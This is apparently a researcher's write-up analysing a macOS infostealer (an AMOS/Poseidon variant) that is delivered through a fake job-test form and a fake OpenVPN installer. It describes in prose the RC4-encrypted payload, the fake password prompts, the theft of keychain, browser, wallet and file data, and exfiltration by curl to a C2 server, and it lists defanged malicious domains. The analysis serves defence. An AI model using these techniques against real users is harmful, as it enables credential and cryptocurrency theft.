macOS InfoStealer - Malware Research
Recently, I was given the opportunity to conduct an analysis on a real malware at work and was praised for my efforts and dedication in analyzing it. Here is my writeup on the whole incident.
Malware Distribution
On 12th September, a user received a Google Form acting as a hiring test from a supposedly fake company Vantage Point Media <vpmediatech[.]com>. The user was prompted to input their email and name, and answer a set of questions replicating real interview questions. However, the user was then prompted to download a suspicious OpenVPN program on the final page.
If the user was using macOS, accessing the download link will redirect the user to https://utv4fun[.]com/kusaka[.]php?call=vpn, where a .dmg file will be fetched and downloaded automatically into the system. After a few page refreshes, we can actually see several .dmg files being downloaded, each having a different version number at the end.
If the user was using Windows, accessing the download link will instead redirect the user to https://openvpn-win[.]pages[.]dev/ where a malicious MSI installer will be downloaded automatically into the system. However, the scope of this writeup will only be on the .dmg file for now.
Technical Anallysis
Further examining the contents by mounting the .dmg file as a volume on my virtual machine (macOS Sonoma 14), it contained a universal Mach-O binary which supports both x86 and ARM architecture. It’s also ad-hoc signed which means that it doesn’t contain any cryptographic proof.
Executing the binary file directly, the user will be prompted to launch the application via right clicking and opening it. This was a common tactic used to override GateKeeper (an integrated security feature in Apple’s operating system) and execute unsigned applications. Ref.
After launching the application, the user was prompted again to input their password. This was most likely to trick the user in providing root privileges for the malware to access certain macOS utilities.
Decompiling the binary file, a long hex string can be identified which was most likely the payload.
Coincidentally, a 32-byte hex string can be identified right below the payload, most likely a key for decryption.
Instead of utilising XOR, the payload was encrypted with RC4 instead. The decrypted payload can be downloaded here: download (password is infected)
Payload Analysis
Hide Terminal and Create Staging Directory
Analyzing the AppleScript, the malware first begins by the variables release and filegrabbers are set to true, most likely to initialize certain functions during the data exfiltration process. It then ensures the Terminal window stays hidden while the script is running in the background to conceal itself from the user.
The malware then retrieves the current username to constructs the path to the user’s home directory. It also creates a staging directory to store every stolen data extracted from the system. This staging directory is created using a random four-digit number between 1000 and 9999 and it is assigned to the variable writemind.
System Information Extraction
The data extraction process begins by extracting system information including software, hardware, and display configurations using the system_profiler utility. The result of this command is then written to a file named “info” under the staging directory.
Password Prompt using DSCL
The malware constructs the path to the user’s Application Support directory, which is used to locate various application data. The malware then calls a function to retrieve the password from the user using DSCL to display an authentication prompt.
According to the checkvalid() and getpwd() functions, if the password entered by the user was valid, the malware will attempt to retrieve the Chrome password from the macOS keychain and write it to a file named “masterpass-chrome” under the staging directory. If not, the malware enters a loop that continuously prompts the user to enter the valid password.
Data Extraction
Several mappings were created to define the directory paths for specific Chromium-based browsers and cryptocurrency wallet applications.
The malware then proceeds to recursively read the data stored in the mapped directories to extract Chromium-based browser data (cookies, web data, plugins, etc.) and JSON files for specific cryptocurrency wallet applications, each of them being stored as different files and directories under the staging directory. The malware can also be seen using the filegrabber() function to extract Safari cookies, Apple Note database and files with the extension of .pdf, .docx, .doc, .wallet and .keys on the Desktop, Documents and Downloads folder. The extracted data from filegrabber() copied and placed within a directory named “FileGrabber” under the staging directory.
One thing to note, the filegrabber() function seem to only extract files that do not exceed the file size of 10 MB before copying them to the “FileGrabber” folder. This was most likely done to prevent network bandwidth issues, server limitations, and timeouts during data exfiltration to the C2 server.
Data from other sources was also extracted including Firefox data, keychain database and Telegram data, each of them being stored as different files under the staging directory.
Exfiltration
Finally, the malware compresses the staging directory into a ZIP file to be exfiltrated to the C2 server using curl via a POST HTTP request to the /joinsystem endpoint, employing a predefined user and BuildID. It also covers its track by removing the staging directory and ZIP file from the system after exfiltration.
Summary
The malware was a variant of the Atomic macOS Stealer (AMOS)/Poseidon infostealer that affects both Windows and macOS users. The reason why I documented this incident was because it was the first time (to my knowledge) encountering an AMOS variant that masqueraded using OpenVPN and used RC4 as its payload encryption method. Additionally, I want to share fun stuff I’ve encountered during my work instead of just triaging alerts daily.